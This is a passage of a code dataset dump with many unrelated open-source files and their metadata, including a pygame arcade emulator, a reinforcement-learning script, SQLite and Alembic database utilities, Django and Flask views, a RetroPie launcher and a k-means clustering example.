open(state_path, 'wb') as state_file:\n            pickle.dump(self._cpu, state_file)\n\n    @classmethod\n    def load(cls, state):\n        \"\"\"\n        Load CPU state from disk\n\n        :param state: Pickle file\n        :return:\n        \"\"\"\n\n        with open(\"saves/\" + state, 'rb') as state_file:\n            cpu = pickle.load(state_file)\n\n        emu = cls()\n        emu._cpu = cpu\n        emu._cheats = SpaceInvadersCheatEngine(cpu.memory)\n        return emu\n\n    def run(self):\n        \"\"\"\n        Sets up display and starts game loop\n\n        :return:\n        \"\"\"\n        ctypes.windll.user32.SetProcessDPIAware()\n        pygame.init()\n        self._main_audio = pygame.mixer.Channel(0)\n        self._sounds = []\n        self._repeating_sound = False\n        self._last_port3 = self._cpu.io.out_port3\n        self._last_port5 = self._cpu.io.out_port5\n        self._window = pygame.display.set_mode(\n            (self._window_width, self._window_height), pygame.RESIZABLE)\n        surface = pygame.Surface((self._height, self._width))\n        self._scaled_surface = pygame.Surface(\n            (self._scaled_height, self._scaled_width))\n        caption = self.CAPTION_FORMAT.format(self._path if self._path else '')\n        pygame.display.set_caption(caption)\n        self._px_array = pygame.PixelArray(surface)\n        pygame.display.update()\n        fps_clock = pygame.time.Clock()\n        if os.path.exists('sound/0.wav'):\n            pygame.mixer.music.load('sound/0.wav')\n            self._repeating_sound = True\n        for i in range(1, 9):\n            if os.path.exists('sound/{0}.wav'.format(i)):\n                self._sounds.append(pygame.mixer.Sound(\n                    'sound/{0}.wav'.format(i)))\n            else:\n                self._sounds.append(None)\n\n        while True:\n            for event in pygame.event.get():\n                self._handle(event)\n\n            self._cpu.run()\n            self._refresh()\n            self._play_audio()\n            fps_clock.tick(self._fps)\n            pygame.transform.scale(\n                surface, (self._scaled_height, self._scaled_width), self._scaled_surface)\n            horizontal_pos = int(\n                (self._window_width - self._scaled_surface.get_width()) / 2)\n            vertical_pos = int(\n                (self._window_height - self._scaled_surface.get_height()) / 2)\n            self._window.blit(self._scaled_surface,\n                              (horizontal_pos, vertical_pos))\n            pygame.display.update()\n","sub_path":"emulator.py","file_name":"emulator.py","file_ext":"py","file_size_in_byte":11392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"650888434","text":"import gym\nimport numpy as np\n\n\ndef mc_policy_gradient(env, theta, lr, episodes):\n    for _ in range(episodes):  # iterate over the episodes\n        episode = []\n        start_observation = env.reset()  # initialize the environment\n        t = 0\n        while True:\n            env.render()  # rendering is not supported in notebooks\n            policy = np.dot(theta, start_observation)  # compute the policy value\n            # the action_space here is 2, so use a Sigmoid activation on the policy value\n            pi = 1 / (1 + np.exp(-policy))\n            if pi >= 0.5:\n                action = 1  # apply force to the right\n            else:\n                action = 0  # apply force to the left\n            next_observation, reward, done, _ = env.step(action)  # take the action\n            # append the environment's return values to the episode\n            episode.append([next_observation, action, pi, reward])\n            start_observation = next_observation  # use the returned observation for the next iteration\n            t += 1\n            if done:\n                print(\"Episode finished after {} timesteps\".format(t))\n                break\n        # update the parameters theta based on the last episode\n        for timestep in episode:\n            observation, action, pi, reward = timestep\n            theta += lr * (1 - pi) * np.transpose(-observation) * reward\n\n    return theta\n\n\nif __name__ == '__main__':\n    lr = 0.005\n    theta = np.random.rand(4)\n    episodes = 10\n    env = gym.make('CartPole-v1')\n    mc_policy_gradient(env, theta, lr, episodes)","sub_path":"Answers/week8-challenge-03/mc_cartpole.py","file_name":"mc_cartpole.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87167948","text":"import sqlite3 as lite\nimport csv\n\nDATABASE = \"test.db\"\n \ndef create_table(name,qtable):\n	con = lite.connect(DATABASE)\n	cur = con.cursor() \n	\n	with con:\n		cur.execute(qtable)\n		print(\"Created table \" + name)\n\n	cleartable = \"delete from \" + name\n	with con:\n		cur.execute(cleartable)\n		\n	con.close()	\n		\n	\ndef create_deps():\n	con = lite.connect(DATABASE)\n	cur = con.cursor() \n\n	cleartable = \"delete from departments\"\n	with con:\n		cur.execute(cleartable)\n		\n	reader = csv.reader(open('D:\departments.csv', 'r'),delimiter=\";\")\n	for row in reader:\n		name = \"department\"+row[0]\n		qtable = \"CREATE TABLE IF NOT EXISTS \"+name+\" (id Integer PRIMARY KEY AUTOINCREMENT, timecreate DateTime, timeupdate DateTime, kod1c Integer, sk Text, qty Double, idDep integer)\"\n		create_table(name, qtable)\n	\n		iquery = \"Insert into departments (id,name) values (\"+row[0]+\",'\"+row[1]+\"')\"\n		with con:\n			cur.execute(iquery)\n			\n	con.close()		\n			\ndef fill_goods():\n	con = lite.connect(DATABASE)\n	cur = con.cursor() \n	cleartable = \"delete from goods\"\n	with con:\n		cur.execute(cleartable)\n		\n	i = ii = 0 \n	reader = csv.reader(open('D:\goods.csv', 'r'),delimiter=\";\")\n	for row in reader:\n		i += 1\n		name = row[2]\n		name = name.replace(\"'\",\"`\")\n		qtable = \"insert or replace into goods (sk,kod1c,name) values ('\"+row[1]+\"','\"+row[0]+\"','\"+name+\"')\"\n		cur.execute(qtable)\n		con.commit()\n		if i == 1000:\n			i = 0\n			ii += 1\n			print(ii)\n	\n# Create the departments\ncreate_deps()\n\n# Fill with goods\n# fill_goods()\n\n\n\n	\n ","sub_path":"create_db_for_tablet.py","file_name":"create_db_for_tablet.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311242913","text":"\"\"\"empty message\n\nRevision ID: affdea0e2edd\nRevises: e333d0326181\nCreate Date: 2021-01-18 02:29:58.593628\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'affdea0e2edd'\ndown_revision = 'e333d0326181'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n    # ### commands auto generated by Alembic - please adjust! ###\n    op.drop_column('history', 'url')\n    # ### end Alembic commands ###\n\n\ndef downgrade():\n    # ### commands auto generated by Alembic - please adjust! 
###\n op.add_column('history', sa.Column('url', sa.VARCHAR(length=200), autoincrement=False, nullable=False))\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/affdea0e2edd_.py","file_name":"affdea0e2edd_.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"221876171","text":"#\n# [637] Average of Levels in Binary Tree\n#\n# https://leetcode.com/problems/average-of-levels-in-binary-tree/description/\n#\n# algorithms\n# Easy (55.95%)\n# Total Accepted: 43.9K\n# Total Submissions: 78.6K\n# Testcase Example: '[3,9,20,15,7]'\n#\n# Given a non-empty binary tree, return the average value of the nodes on each\n# level in the form of an array.\n#\n# Example 1:\n#\n# Input:\n# ⁠ 3\n# ⁠ / \\\n# ⁠ 9 20\n# ⁠ / \\\n# ⁠ 15 7\n# Output: [3, 14.5, 11]\n# Explanation:\n# The average value of nodes on level 0 is 3, on level 1 is 14.5, and on level\n# 2 is 11. Hence return [3, 14.5, 11].\n#\n#\n#\n# Note:\n#\n# The range of node's value is in the range of 32-bit signed integer.\n#\n#\n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom collections import deque\n\n\nclass Solution:\n def averageOfLevels(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[float]\n \"\"\"\n if root is None:\n return []\n\n ret = []\n depth = 0\n total = 0\n count = 0\n pool = deque([(root, 0)])\n\n while pool:\n node, d = pool.popleft()\n\n if d == depth:\n count += 1\n total += node.val\n\n else:\n ret.append(total / float(count))\n depth += 1\n total = node.val\n count = 1\n\n for child in [node.left, node.right]:\n if child:\n pool.append((child, d + 1))\n\n if count > 0:\n ret.append(total / float(count))\n\n return ret\n","sub_path":"src/637.average-of-levels-in-binary-tree.python3.py","file_name":"637.average-of-levels-in-binary-tree.python3.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"369021208","text":"import sys, psutil, os, re, subprocess, time, ConfigParser, socket, threading\n\n## killTasks\ndef killTasks(procnames):\n try:\n for proc in psutil.process_iter():\n if proc.name() in procnames:\n pid = str(proc.as_dict(attrs=['pid'])['pid'])\n name = proc.as_dict(attrs=['name'])['name']\n subprocess.call([\"sudo\", \"kill\", \"-15\", pid])\n \n kodiproc = [\"kodi\", \"kodi.bin\"] # kodi needs SIGKILL -9 to close\n for proc in psutil.process_iter():\n if proc.name() in kodiproc:\n pid = str(proc.as_dict(attrs=['pid'])['pid'])\n name = proc.as_dict(attrs=['name'])['name']\n subprocess.call([\"sudo\", \"kill\", \"-9\", pid])\n except:\n pass\n\n## getEmulatorPath\ndef getEmulatorpath(console):\n path = \"/opt/retropie/supplementary/runcommand/runcommand.sh 0 _SYS_ \" + console + \" \"\n return path\n\n## getGamePath\ndef getGamePath(console, game):\n # escape the spaces and brackets in game filename\n game = game.replace(\" \", \"\\ \")\n game = game.replace(\"(\", \"\\(\")\n game = game.replace(\")\", \"\\)\")\n game = game.replace(\"'\", \"\\\\'\")\n \n gamePath = \"/home/pi/RetroPie/roms/\" + console + \"/\" + game\n return gamePath\n\ndef process_exists(proc_name):\n try:\n ps = subprocess.Popen(\"ps ax -o pid= -o args= \", shell=True, stdout=subprocess.PIPE)\n ps_pid = ps.pid\n output = ps.stdout.read()\n ps.stdout.close()\n ps.wait()\n for line in output.split(\"\\n\"):\n res = re.findall(\"(\\d+) 
(.*)\", line)\n if res:\n pid = int(res[0][0])\n if proc_name in res[0][1] and pid != os.getpid() and pid != ps_pid:\n return True\n return False\n except:\n return False\n\ndef process_id(proc_name):\n try:\n ps = subprocess.Popen(\"ps ax -o pid= -o args= \", shell=True, stdout=subprocess.PIPE)\n ps_pid = ps.pid\n output = ps.stdout.read()\n ps.stdout.close()\n ps.wait()\n for line in output.split(\"\\n\"):\n res = re.findall(\"(\\d+) (.*)\", line)\n if res:\n pid = int(res[0][0])\n if proc_name in res[0][1] and pid != os.getpid() and pid != ps_pid:\n return pid\n return 0\n except:\n return 0\n\n## runGame\ndef runGame(console, game, source):\n try:\n # update status\n f = open('/home/pi/scripts/picontrol/configs/status.conf', 'rw+')\n f.seek(0)\n f.truncate()\n f.seek(0)\n f.write(source)\n f.close()\n\n emulationstationRunning = process_exists('emulationstation')\n\n procnames = [\"retroarch\", \"ags\", \"uae4all2\", \"uae4arm\", \"capricerpi\", \"linapple\", \"hatari\", \"stella\",\n \"atari800\", \"xroar\", \"vice\", \"daphne\", \"reicast\", \"pifba\", \"osmose\", \"gpsp\", \"jzintv\",\n \"basiliskll\", \"mame\", \"advmame\", \"dgen\", \"openmsx\", \"mupen64plus\", \"gngeo\", \"dosbox\", \"ppsspp\",\n \"simcoupe\", \"scummvm\", \"snes9x\", \"pisnes\", \"frotz\", \"fbzx\", \"fuse\", \"gemrb\", \"cgenesis\", \"zdoom\",\n \"eduke32\", \"lincity\", \"love\", \"alephone\", \"micropolis\", \"openbor\", \"openttd\", \"opentyrian\",\n \"cannonball\", \"tyrquake\", \"ioquake3\", \"residualvm\", \"xrick\", \"sdlpop\", \"uqm\", \"stratagus\",\n \"wolf4sdl\", \"solarus\", \"emulationstation\"]\n killTasks(procnames)\n\n pid = os.fork()\n if not pid:\n try:\n if ((emulationstationRunning == False and source == '') or console == ''):\n subprocess.call('emulationstation', shell=True)\n else:\n print(getEmulatorpath(console) + getGamePath(console,game))\n except:\n pass\n os._exit(0)\n else: \n response = {'type':'success','data':'','message':'Successfully started game.'}\n return response\n except:\n return {'type':'error','data':'','message':'Failed to start game.'}\n\n#////////////\n","sub_path":"processes.py","file_name":"processes.py","file_ext":"py","file_size_in_byte":4065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"210375398","text":"from django.shortcuts import render\nfrom django.conf import settings\n\nfrom rest_framework import authentication, permissions, viewsets, filters, mixins\nfrom rest_framework_jwt.authentication import JSONWebTokenAuthentication\n\nfrom .models import Church, Person, Interest, SkillAndProfession, \\\n SpiritualMilestone, Ministry, MemberStatus, PersonInterest, \\\n PersonSkillAndProfession, PersonSpiritualMilestone\nfrom .serializers import ChurchSerializer, PersonSerializer, \\\n InterestSerializer, SkillAndProfessionSerializer, \\\n SpiritualMilestoneSerializer, MinistrySerializer, MemberStatusSerializer, \\\n PersonInterestSerializer, PersonSkillAndProfessionSerializer, \\\n PersonSpiritualMilestoneSerializer\nfrom .forms import PersonInterestFilter, PersonSkillAndProfessionFilter, \\\n PersonSpiritualMilestoneFilter\n\n\nclass DefaultsMixin(object):\n \"\"\"\n Default settings for view authentication, permissions,\n filtering and pagination.\n \"\"\"\n if settings.DEBUG:\n authentication_classes = (\n authentication.BasicAuthentication,\n JSONWebTokenAuthentication,)\n else:\n authentication_classes = (JSONWebTokenAuthentication,)\n\n permission_classes = (\n permissions.IsAuthenticated,\n 
)\n\n\nclass ChurchViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"API Endpoint for listing and creating daughter churches\"\"\"\n queryset = Church.objects.all()\n serializer_class = ChurchSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', 'church_type', )\n\n\nclass InterestViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Interest List\n \"\"\"\n\n queryset = Interest.objects.all()\n serializer_class = InterestSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass SkillAndProfessionViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Skills and Professions List\n \"\"\"\n\n queryset = SkillAndProfession.objects.all()\n serializer_class = SkillAndProfessionSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass SpiritualMilestoneViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Spiritual Milestones List\n \"\"\"\n\n queryset = SpiritualMilestone.objects.all()\n serializer_class = SpiritualMilestoneSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass MinistryViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Ministry List\n \"\"\"\n\n queryset = Ministry.objects.all()\n serializer_class = MinistrySerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass MemberStatusViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, updating, deleting Member Statuses List\n \"\"\"\n\n queryset = MemberStatus.objects.all()\n serializer_class = MemberStatusSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('name', )\n ordering_fields = ('name', )\n\n\nclass PersonViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.UpdateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API 
Endpoint for listing and creating daughter churches\n \"\"\"\n\n queryset = Person.objects.all()\n serializer_class = PersonSerializer\n filter_backends = (\n filters.DjangoFilterBackend,\n filters.SearchFilter,\n filters.OrderingFilter,\n )\n search_fields = ('first_name', 'last_name',)\n ordering_fields = ('first_name', 'last_name', )\n\n\nclass PersonInterestViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Interest\n \"\"\"\n\n queryset = PersonInterest.objects.all()\n serializer_class = PersonInterestSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonInterestFilter\n\n\nclass PersonSkillAndProfessionViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Skills/Professions\n \"\"\"\n\n queryset = PersonSkillAndProfession.objects.all()\n serializer_class = PersonSkillAndProfessionSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonSkillAndProfessionFilter\n\n\nclass PersonSpiritualMilestoneViewSet(mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n mixins.CreateModelMixin,\n mixins.DestroyModelMixin,\n DefaultsMixin,\n viewsets.GenericViewSet):\n \"\"\"\n API Endpoint for listing, creating, and deleting maps for Person and Spiritual Milestone\n \"\"\"\n\n queryset = PersonSpiritualMilestone.objects.all()\n serializer_class = PersonSpiritualMilestoneSerializer\n filter_backends = (filters.DjangoFilterBackend,)\n filter_class = PersonSpiritualMilestoneFilter\n","sub_path":"ChMS_project/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"98644836","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution:\n def kthSmallest1(self, root: TreeNode, k: int) -> int:\n ans = float('-inf')\n def inorder(node):\n nonlocal k, ans\n if ans != float('-inf'): # already find an answer, skip following operations\n return\n\n if not node:\n return None\n\n inorder(node.left)\n k = k - 1\n if k == 0:\n ans = node.val\n inorder(node.right)\n\n inorder(root)\n return int(ans)\n\n #iterative\n def kthSmallest2(self, root: TreeNode, k: int) -> int:\n self.ans = 0\n self.cnt = k\n\n stack = []\n while root or stack:\n while root:\n stack.append(root)\n root = root.left\n root = stack.pop()\n k = k - 1\n if k == 0:\n break\n root = root.right\n\n return root.val\n","sub_path":"solutions/tree/problem230_Kth Smallest Element in a BST.py","file_name":"problem230_Kth Smallest Element in a BST.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"148670481","text":"\"\"\"\nFortune Teller (Horoscope) - A program that checks your horoscope on various astrology sites and\nputs them together for you each day.\n\"\"\"\nimport sys\n# noinspection PyCompatibility\nimport urllib.request as ur\nfrom bs4 import BeautifulSoup\n\n\ndef horoscope(sign):\n \"\"\"\n :param sign:\n \"\"\"\n url = 'http://my.horoscope.com/astrology/free-daily-horoscope-%s.html' % sign\n 
html_doc = ur.urlopen(url)\n    soup = BeautifulSoup(html_doc.read(), features=\"lxml\")\n    text = soup.find_all(id=\"textline\")[1].get_text()\n    date = soup.find_all(id='advert')[1].get_text()\n    print(\"%s - %s\\n\\n%s\" % (sign.capitalize(), date, text))\n\n\nif __name__ == '__main__':\n    try:\n        horoscope(sys.argv[1])\n    except IndexError:\n        print(\"Please enter a valid zodiac sign.\\nUsage example: python horoscope.py taurus\")\n","sub_path":"projects/numbering/fortune.py","file_name":"fortune.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"515539604","text":"#!/usr/bin/python\r\nimport logging, utils, curses\r\n\r\nclass CursesHandler(logging.Handler):\r\n    \"\"\"\r\n    Creates a curses object to interface with a terminal output.\r\n    \"\"\"\r\n\r\n    def __init__(self, screen):\r\n        \"\"\"Constructor for the CursesHandler class.\r\n\r\n        Keyword arguments:\r\n        self -- The caller, the new CursesHandler\r\n        screen -- presumably where the graphics will be displayed\r\n\r\n        Side effects:\r\n        - Sets instance variables\r\n        - Sets the color for curses\r\n        \"\"\"\r\n        logging.Handler.__init__(self)\r\n        self.screen = screen\r\n\r\n        curses.start_color()\r\n        curses.use_default_colors()\r\n        for i in range(0, curses.COLORS):\r\n            curses.init_pair(i + 1, i, -1)\r\n\r\n    def emit(self, record):\r\n        \"\"\"\r\n        This method tries to establish a connection with the screen and refresh it.\r\n\r\n        Keyword arguments:\r\n        self -- The caller\r\n        record -- The log record to display\r\n\r\n        Side effects:\r\n        - Writes the formatted record to the screen and refreshes it\r\n        \"\"\"\r\n        try:\r\n            screen = self.screen\r\n            screen.addstr(u'\\n%s' % self.format(record), self.get_color_pair(record.levelno))\r\n            screen.refresh()\r\n        except (KeyboardInterrupt, SystemExit):\r\n            raise\r\n        except:\r\n            self.handleError(record)\r\n\r\n    def get_color_pair(self, level):\r\n        \"\"\"\r\n        Returns a color pair based on a level.\r\n\r\n        Keyword arguments:\r\n        self -- The caller\r\n        level -- the index of the color in the array\r\n        \"\"\"\r\n        index = str(level)\r\n        return curses.color_pair({\r\n            '10': 83,\r\n            '20': 39,\r\n            '30': 245,\r\n            '40': 167,\r\n            '50': 197\r\n        }[index])\r\n","sub_path":"src/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"350312150","text":"from django.contrib.auth.models import User\n\nfrom daiquiri.core.utils import send_mail\n\n\ndef get_manager_emails():\n    return [user.email for user in User.objects.filter(groups__name='meetings_manager')]\n\n\ndef send_registration_mails(request, meeting, participant, contribution=None):\n    # sends an email to the meeting managers once a participant has registered.\n    send_mail(request, 'meetings/email/notify_registration', {\n        'meeting': meeting,\n        'participant': participant,\n        'contribution': contribution\n    }, get_manager_emails())\n\n    # sends an email to the participant once he/she has registered.\n    send_mail(request, 'meetings/email/registration', {\n        'meeting': meeting,\n        'participant': participant,\n        'contribution': contribution\n    }, [participant.email])\n","sub_path":"daiquiri/meetings/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206601181","text":"\"\"\"\nexample of accessing/using newton_fcn_modname outside of nk_driver\n\"\"\"\n\nimport configparser\nimport 
importlib\nimport logging\nimport sys\n\nfrom model_config import ModelConfig\nfrom nk_driver import parse_args\n\nargs = parse_args()\nconfig = configparser.ConfigParser()\nconfig.read(args.cfg_fname)\n\nlogging_format = '%(asctime)s:%(process)s:%(filename)s:%(funcName)s:%(message)s'\nlogging.basicConfig(format=logging_format, stream=sys.stdout, level='DEBUG')\nlogger = logging.getLogger(__name__)\n\nModelConfig(config['modelinfo'])\n\n# import module with NewtonFcn class\nnewton_fcn_mod = importlib.import_module(config['modelinfo']['newton_fcn_modname'])\nnewton_fcn_obj = newton_fcn_mod.NewtonFcn()\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00.nc')\nms.log('iterate_test_00')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00.nc')\nms.log('fcn_test_00')\n\nms = newton_fcn_obj.model_state_obj('w_test_00.nc')\nms.log('w_test_00')\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00_fp1.nc')\nms.log('iterate_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00_fp1.nc')\nms.log('fcn_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('w_test_00_fp1.nc')\nms.log('w_test_00_fp1')\n\nms = newton_fcn_obj.model_state_obj('iterate_test_00_fp2.nc')\nms.log('iterate_test_00_fp2')\n\nms = newton_fcn_obj.model_state_obj('fcn_test_00_fp2.nc')\nms.log('fcn_test_00_fp2')\n\nms = newton_fcn_obj.model_state_obj('w_test_00_fp2.nc')\nms.log('w_test_00_fp2')\n","sub_path":"model_standalone.py","file_name":"model_standalone.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"339645115","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 21 00:12:56 2019\n\n@author: brgupta\n\"\"\"\n\n# K-means cluster \n\n# importing the library\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n# importing the mall dataset with pandas\ndataset=pd.read_csv('Mall_Customers.csv')\nx = dataset.iloc[:,[3,4]].values\n\n# importing the mail dataset with pandas\nfrom sklearn.cluster import KMeans\nwcss = []\nfor i in range(1,11):\n kmeans = KMeans(n_clusters =i ,init='k-means++',max_iter=300,n_init=10,random_state=0)\n kmeans.fit(x)\n wcss.append(kmeans.inertia_)\n \nplt.plot(range(1,11),wcss)\nplt.title('The Elbow method')\nplt.xlabel('number of clusters')\n#plt.y_lable(wcss)\nplt.show()\n\n\n# applying K-means to the mall dataset\nkmeans = KMeans(n_clusters=5,init='k-means++',max_iter=300,n_init=10,random_state=0)\ny_means = kmeans.fit_predict(x)\nplt.scatter(x[y_means == 0,0],x[y_means == 0,1],s=100,c='red',label='Cluster 1:Careful')\nplt.scatter(x[y_means == 1,0],x[y_means == 1,1],s=100,c='blue',label='Cluster 2:standard')\nplt.scatter(x[y_means == 2,0],x[y_means == 2,1],s=100,c='green',label='Cluster 3: target')\nplt.scatter(x[y_means == 3,0],x[y_means == 3,1],s=100,c='magenta',label='Cluster 4:careless')\nplt.scatter(x[y_means == 4,0],x[y_means == 4,1],s=100,c='yellow',label='Cluster 5:sensible')\nplt.scatter(kmeans.cluster_centers_[:,0],kmeans.cluster_centers_[:,1],s=300,c='black',label='Centroids')\nplt.title('Clusters of client')\nplt.xlabel('Anual income (k$))')\nplt.ylabel('Spending score (1-100)')\nplt.legend()\nplt.show()\n","sub_path":"Clustering/K-MeansClustering/k-means-cluster.py","file_name":"k-means-cluster.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"614950680","text":"import sys\nimport re\nfrom textblob import TextBlob\nfrom 
collections import Counter\n\nn=6000\ntrain_n = 5000\ntest_n = 1000\nallwords = re.findall('\\w+',open(sys.argv[1]).read())\nword_list = Counter(allwords).most_common(n)\n\n\nm = open(sys.argv[6],\"r\")\ntags={}\nfor line in m:\n\tpair = line.split('\\t')\n\ttags[pair[0]] = pair[1].rstrip()\nm.close()\n\nf1= open(sys.argv[2],\"w\")\nf2 = open(sys.argv[3],\"w\")\nsource = sys.argv[4]\ntarget =sys.argv[5]\ncount = 0\nfor word in word_list:\n\tword_map = TextBlob(word[0]).translate(from_lang=source,to=target)\n\ttag = tags[TextBlob(word[0]).tags[0][1]]\n\tword_pair = (word[0].rstrip() + \"_\" + tag + \" \" + word_map.string + \"_\" + tag + \"\\n\")\n\tcount = count + 1\n\tif count <= train_n:\n\t\tf1.write(word_pair.encode('utf8'))\n\telse :\n\t\tf2.write(word_pair.encode('utf8'))\n\t#print(word_pair.encode('utf8'))\n\t\n\nf1.close()\nf2.close()\n\t\n","sub_path":"src/dictionary/Create_dictionary.py","file_name":"Create_dictionary.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"475849053","text":"from flask import render_template, redirect, url_for, session\nfrom flask_login import login_required\nfrom .forms import SearchForm\nfrom . import main\nfrom ..scrape import scrape_all\n\n\n# Front page\n@main.route('/', methods=['GET'])\ndef index():\n\treturn render_template('index.html')\n\n\n# Handles user search input\n@main.route('/search', methods=['GET', 'POST'])\n@login_required\ndef search():\n\tscrape_all()\n\tproducer = None \n\tyear = None\n\tform = SearchForm()\n\n\t# If handling a POST request, set values for the session and redirect\n\tif form.validate_on_submit():\n\t\tsession['producer'] = form.producer.data\n\t\tsession['year'] = form.year.data\n\t\treturn redirect(url_for('.search'))\n\n\t# If handling a GET request, render the template \n\treturn render_template('search.html', form=form, producer=session.get('producer'), year=session.get('year'))\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"50573385","text":"from datetime import timedelta\n\nfrom django.db import models\nfrom django.db.models.query_utils import Q\n\n\nclass EventManager(models.Manager):\n \"\"\"Provides several extra handy methods to find events.\"\"\"\n def get_queryset(self):\n return super(EventManager, self).get_queryset().filter(deleted=False)\n\n def occuring_at(self, start, end):\n \"\"\"Returns the events that occur (partially or entirely) between the\n given start and end datetimes.\n \"\"\"\n # An event is in the given interval if the event's start or end date\n # is in the given interval, or when the start date is before the given\n # interval and the end date is after the given 